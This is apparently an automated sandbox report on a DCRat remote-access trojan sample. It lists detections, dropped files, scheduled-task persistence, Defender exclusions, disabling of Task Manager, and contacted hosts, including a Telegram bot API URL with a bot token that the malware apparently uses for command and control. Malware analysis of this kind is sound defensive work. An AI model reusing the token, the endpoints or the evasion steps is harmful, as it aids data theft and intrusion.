                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading
                                    LSA Secrets1
                                    Process Discovery
                                    SSHKeylogging14
                                    Application Layer Protocol
                                    Scheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts23
                                    Masquerading
                                    Cached Domain Credentials141
                                    Virtualization/Sandbox Evasion
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                    Modify Registry
                                    DCSync1
                                    Application Window Discovery
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                                    Virtualization/Sandbox Evasion
                                    Proc Filesystem1
                                    Remote System Discovery
                                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                                    Process Injection
                                    /etc/passwd and /etc/shadow11
                                    System Network Configuration Discovery
                                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543377 Sample: PbfYaIvR5B.exe Startdate: 27/10/2024 Architecture: WINDOWS Score: 100 84 api.telegram.org 2->84 86 windowsxp.top 2->86 88 ipinfo.io 2->88 98 Suricata IDS alerts for network traffic 2->98 100 Antivirus detection for dropped file 2->100 102 Antivirus / Scanner detection for submitted sample 2->102 106 10 other signatures 2->106 11 PbfYaIvR5B.exe 3 6 2->11         started        14 AvdGjRxbXYfvkpkpztF.exe 14 32 2->14         started        18 svchost.exe 2->18         started        20 5 other processes 2->20 signatures3 104 Uses the Telegram API (likely for C&C communication) 84->104 process4 dnsIp5 66 C:\webHostnet\MsPortSavesruntime.exe, PE32 11->66 dropped 22 wscript.exe 1 11->22         started        25 conhost.exe 11->25         started        94 windowsxp.top 188.114.97.3, 49739, 49742, 49743 CLOUDFLARENETUS European Union 14->94 68 C:\Users\user\Desktop\wVOwcuVh.log, PE32 14->68 dropped 70 C:\Users\user\Desktop\lhjGsiaz.log, PE32 14->70 dropped 72 C:\Users\user\Desktop\XurZRnMb.log, PE32 14->72 dropped 74 2 other malicious files 14->74 dropped 118 Antivirus detection for dropped file 14->118 120 Multi AV Scanner detection for dropped file 14->120 122 Machine Learning detection for dropped file 14->122 124 2 other signatures 14->124 96 127.0.0.1 unknown unknown 18->96 file6 signatures7 process8 signatures9 108 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->108 110 Suspicious execution chain found 22->110 27 cmd.exe 1 22->27         started        process10 process11 29 MsPortSavesruntime.exe 17 20 27->29         started        34 reg.exe 1 1 27->34         started        36 conhost.exe 27->36         started        dnsIp12 90 api.telegram.org 149.154.167.220, 443, 49738, 49756 TELEGRAMRU United Kingdom 29->90 92 ipinfo.io 34.117.59.81, 443, 49736, 49737 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 29->92 76 C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe, PE32 29->76 dropped 78 C:\Users\user\Desktop\mhsoucuo.log, PE32 29->78 dropped 80 C:\Users\user\Desktop\XGvzhUkS.log, PE32 29->80 dropped 82 7 other malicious files 29->82 dropped 126 Multi AV Scanner detection for dropped file 29->126 128 Adds a directory exclusion to Windows Defender 29->128 130 Creates processes via WMI 29->130 38 cmd.exe 29->38         started        41 powershell.exe 29->41         started        43 powershell.exe 29->43         started        45 4 other processes 29->45 132 Disable Task Manager(disabletaskmgr) 34->132 134 Disables the Windows task manager (taskmgr) 34->134 file13 signatures14 process15 signatures16 112 Uses ping.exe to sleep 38->112 114 Uses ping.exe to check the status of other devices and networks 38->114 47 AvdGjRxbXYfvkpkpztF.exe 38->47         started        50 conhost.exe 38->50         started        64 2 other processes 38->64 116 Loading BitLocker PowerShell Module 41->116 52 conhost.exe 41->52         started        54 WmiPrvSE.exe 41->54         started        56 conhost.exe 43->56         started        58 conhost.exe 45->58         started        60 conhost.exe 45->60         started        62 conhost.exe 45->62         started        process17 signatures18 136 Multi AV Scanner detection for dropped file 47->136

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand
                                    SourceDetectionScannerLabelLink
                                    PbfYaIvR5B.exe68%ReversingLabsByteCode-MSIL.Trojan.Vigorf
                                    PbfYaIvR5B.exe100%AviraVBS/Runner.VPG
                                    PbfYaIvR5B.exe100%Joe Sandbox ML
                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\Desktop\MSRJxIpk.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\Desktop\MXTAwxLv.log100%AviraTR/AVI.Agent.updqb
                                    C:\Recovery\AvdGjRxbXYfvkpkpztF.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\y7jCVExOhX.bat100%AviraBAT/Delbat.C
                                    C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe100%AviraHEUR/AGEN.1323342
                                    C:\Recovery\AvdGjRxbXYfvkpkpztF.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\XGvzhUkS.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Recovery\AvdGjRxbXYfvkpkpztF.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\XLyrgJGd.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Recovery\AvdGjRxbXYfvkpkpztF.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\mhsoucuo.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\lhjGsiaz.log100%Joe Sandbox ML
                                    C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe100%Joe Sandbox ML
                                    C:\Recovery\AvdGjRxbXYfvkpkpztF.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\XGvzhUkS.log100%Joe Sandbox ML
                                    C:\Recovery\AvdGjRxbXYfvkpkpztF.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\XLyrgJGd.log100%Joe Sandbox ML
                                    C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe67%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\AvdGjRxbXYfvkpkpztF.exe67%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\AvdGjRxbXYfvkpkpztF.exe67%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\CjxtNgkC.log4%ReversingLabs
                                    C:\Users\user\Desktop\MSRJxIpk.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\MXTAwxLv.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\MaBbbrQq.log24%ReversingLabs
                                    C:\Users\user\Desktop\XGvzhUkS.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\XLyrgJGd.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\XurZRnMb.log24%ReversingLabs
                                    C:\Users\user\Desktop\lhjGsiaz.log8%ReversingLabs
                                    C:\Users\user\Desktop\mhsoucuo.log8%ReversingLabs
                                    C:\Users\user\Desktop\wVOwcuVh.log4%ReversingLabs
                                    C:\webHostnet\AvdGjRxbXYfvkpkpztF.exe67%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\webHostnet\MsPortSavesruntime.exe67%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    No Antivirus matches
                                    SourceDetectionScannerLabelLink
                                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                                    https://contoso.com/License0%URL Reputationsafe
                                    http://crl.mic0%URL Reputationsafe
                                    https://contoso.com/Icon0%URL Reputationsafe
                                    https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
                                    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                                    https://contoso.com/0%URL Reputationsafe
                                    https://nuget.org/nuget.exe0%URL Reputationsafe
                                    https://aka.ms/pscore680%URL Reputationsafe
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                    http://crl.v0%URL Reputationsafe
                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    ipinfo.io
                                    34.117.59.81
                                    truefalse
                                      unknown
                                      windowsxp.top
                                      188.114.97.3
                                      truetrue
                                        unknown
                                        api.telegram.org
                                        149.154.167.220
                                        truetrue
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          https://api.telegram.org/bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhotofalse
                                            unknown
                                            https://ipinfo.io/countryfalse
                                              unknown
                                              https://ipinfo.io/ipfalse
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://nuget.org/NuGet.exepowershell.exe, 00000022.00000002.3095391879.000002B0DFF30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3134224250.0000020A357D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3079926187.000001F91749A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3119918584.000001D12B756000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.telegram.orgMsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003768000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003A86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002A.00000002.2100432581.000001D11B908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://api.telegram.org/botMsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003768000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003A86000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1980966579.00000000018D2000.00000002.00000001.01000000.00000000.sdmpfalse
                                                    unknown
                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000021.00000002.2098310464.000002002830A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2100588671.000002B0D0048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2105948485.0000020A25988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2099175495.000001F9075BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2097797897.000001B4290A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2100432581.000001D11B908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002A.00000002.2100432581.000001D11B908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://crl.microsQpowershell.exe, 00000028.00000002.3305345851.000001B441100000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://ipinfo.ioMsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003A07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://www.microsoft.copowershell.exe, 00000024.00000002.3293225771.0000020A3D7A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://contoso.com/Licensepowershell.exe, 0000002A.00000002.3119918584.000001D12B756000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://crl.micpowershell.exe, 00000024.00000002.3322433699.0000020A3D9D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://contoso.com/Iconpowershell.exe, 0000002A.00000002.3119918584.000001D12B756000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000033.00000003.2102606497.000002092C313000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://github.com/Pester/Pesterpowershell.exe, 0000002A.00000002.2100432581.000001D11B908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://ipinfo.ioMsPortSavesruntime.exe, 00000006.00000002.1989380503.000000000337E000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1989380503.00000000039EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://api.telegrP:oMsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003A86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000021.00000002.2098310464.000002002830A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2100588671.000002B0D0048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2105948485.0000020A25988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2099175495.000001F9075BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2097797897.000001B4290A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2100432581.000001D11B908000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://contoso.com/powershell.exe, 0000002A.00000002.3119918584.000001D12B756000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000021.00000002.3081134305.0000020038157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3134224250.0000020A357D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.3058689357.000001B438EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3119918584.000001D12B756000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://api.telegram.org/bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhotoXMsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003768000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003A86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://crl.micft.cMicRosofpowershell.exe, 00000024.00000002.3322433699.0000020A3D9D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://aka.ms/pscore68powershell.exe, 00000021.00000002.2098310464.00000200280E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2100588671.000002B0CFE21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2105948485.0000020A25761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2099175495.000001F907391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2097797897.000001B428E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2100432581.000001D11B6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://api.telegram.orgMsPortSavesruntime.exe, 00000006.00000002.1989380503.0000000003ACE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMsPortSavesruntime.exe, 00000006.00000002.1989380503.000000000337E000.00000004.00000800.00020000.00000000.sdmp, MsPortSavesruntime.exe, 00000006.00000002.1989380503.00000000039EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2098310464.00000200280E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2100588671.000002B0CFE21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2105948485.0000020A25761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2099175495.000001F907391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2097797897.000001B428E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2100432581.000001D11B6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://crl.vMsPortSavesruntime.exe, 00000006.00000002.2065833724.000000001C311000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://crl.microspowershell.exe, 00000026.00000002.3293568167.000001F91F630000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          149.154.167.220
                                                                          api.telegram.orgUnited Kingdom
                                                                          62041TELEGRAMRUtrue
                                                                          188.114.97.3
                                                                          windowsxp.topEuropean Union
                                                                          13335CLOUDFLARENETUStrue
                                                                          34.117.59.81
                                                                          ipinfo.ioUnited States
                                                                          139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                          IP
                                                                          127.0.0.1
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1543377
                                                                          Start date and time:2024-10-27 19:21:10 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 11m 3s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:53
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:PbfYaIvR5B.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:7471eb468a1f0166167f369bec578915.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@46/68@3/4
                                                                          EGA Information:
                                                                          • Successful, ratio: 25%
                                                                          HCA Information:Failed
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target AvdGjRxbXYfvkpkpztF.exe, PID 3584 because it is empty
                                                                          • Execution Graph export aborted for target AvdGjRxbXYfvkpkpztF.exe, PID 7144 because it is empty
                                                                          • Execution Graph export aborted for target Idle.exe, PID 2084 because it is empty
                                                                          • Execution Graph export aborted for target Idle.exe, PID 4312 because it is empty
                                                                          • Execution Graph export aborted for target MsPortSavesruntime.exe, PID 3128 because it is empty
                                                                          • Execution Graph export aborted for target MsPortSavesruntime.exe, PID 4020 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: PbfYaIvR5B.exe
                                                                          TimeTypeDescription
                                                                          14:22:26API Interceptor34x Sleep call for process: MsPortSavesruntime.exe modified
                                                                          14:22:32API Interceptor132x Sleep call for process: powershell.exe modified
                                                                          14:22:43API Interceptor1382159x Sleep call for process: AvdGjRxbXYfvkpkpztF.exe modified
                                                                          14:22:44API Interceptor2x Sleep call for process: svchost.exe modified
                                                                          18:22:26Task SchedulerRun new task: AvdGjRxbXYfvkpkpztF path: "C:\Recovery\AvdGjRxbXYfvkpkpztF.exe"
                                                                          18:22:26Task SchedulerRun new task: AvdGjRxbXYfvkpkpztFA path: "C:\Recovery\AvdGjRxbXYfvkpkpztF.exe"
                                                                          18:22:26Task SchedulerRun new task: Idle path: "C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe"
                                                                          18:22:26Task SchedulerRun new task: IdleI path: "C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe"
                                                                          18:22:26Task SchedulerRun new task: MsPortSavesruntime path: "C:\webHostnet\MsPortSavesruntime.exe"
                                                                          18:22:26Task SchedulerRun new task: MsPortSavesruntimeM path: "C:\webHostnet\MsPortSavesruntime.exe"
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          149.154.167.220na.docGet hashmaliciousMassLogger RATBrowse
                                                                            na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        SecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              188.114.97.3SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                              • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                              5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                                                              • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                                                                              PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.cc101.pro/4hfb/
                                                                                              QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • filetransfer.io/data-package/cDXpxO66/download
                                                                                              Instruction_1928.pdf.lnk.download.lnkGet hashmaliciousLummaCBrowse
                                                                                              • tech-tribune.shop/pLQvfD4d5/index.php
                                                                                              WBCDZ4Z3M2667YBDZ5K4.bin.exeGet hashmaliciousUnknownBrowse
                                                                                              • tech-tribune.shop/pLQvfD4d5/index.php
                                                                                              yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                              • www.rs-ag.com/
                                                                                              https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                                                                                              • aa.opencompanies.co.uk/vEXJm/
                                                                                              Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • paste.ee/d/KXy1F
                                                                                              01YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                                                                              • 77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
                                                                                              34.117.59.81VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                              • ipinfo.io/json
                                                                                              UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                              • ipinfo.io/json
                                                                                              I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                              • ipinfo.io/json
                                                                                              licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                              • ipinfo.io/ip
                                                                                              build.exeGet hashmaliciousUnknownBrowse
                                                                                              • ipinfo.io/ip
                                                                                              YjcgpfVBcm.batGet hashmaliciousUnknownBrowse
                                                                                              • ipinfo.io/json
                                                                                              lePDF.cmdGet hashmaliciousUnknownBrowse
                                                                                              • ipinfo.io/json
                                                                                              6Mpsoq1.php.ps1Get hashmaliciousUnknownBrowse
                                                                                              • ipinfo.io/json
                                                                                              mjOiDa1hrN.batGet hashmaliciousUnknownBrowse
                                                                                              • ipinfo.io/json
                                                                                              8ym4cxJPyl.ps1Get hashmaliciousUnknownBrowse
                                                                                              • ipinfo.io/json
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              ipinfo.iohttps://load.aberegg-immobilien.ch/Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 34.117.59.81
                                                                                              VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                              • 34.117.59.81
                                                                                              kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                              • 34.117.59.81
                                                                                              sgc0e7HpH5.exeGet hashmaliciousUnknownBrowse
                                                                                              • 34.117.59.81
                                                                                              uHaQ34KPq5.exeGet hashmaliciousUnknownBrowse
                                                                                              • 34.117.59.81
                                                                                              wOP5sowoN1.exeGet hashmaliciousUnknownBrowse
                                                                                              • 34.117.59.81
                                                                                              oD0N44Ka53.exeGet hashmaliciousUnknownBrowse
                                                                                              • 34.117.59.81
                                                                                              sgc0e7HpH5.exeGet hashmaliciousUnknownBrowse
                                                                                              • 34.117.59.81
                                                                                              uHaQ34KPq5.exeGet hashmaliciousUnknownBrowse
                                                                                              • 34.117.59.81
                                                                                              F1NlcL6Ly7.exeGet hashmaliciousUnknownBrowse
                                                                                              • 34.117.59.81
                                                                                              api.telegram.orgna.docGet hashmaliciousMassLogger RATBrowse
                                                                                              • 149.154.167.220
                                                                                              na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              SecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              TELEGRAMRUCQlUZ4KuAa.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              9yJSTTEg68.exeGet hashmaliciousVidarBrowse
                                                                                              • 149.154.167.99
                                                                                              na.docGet hashmaliciousMassLogger RATBrowse
                                                                                              • 149.154.167.220
                                                                                              na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
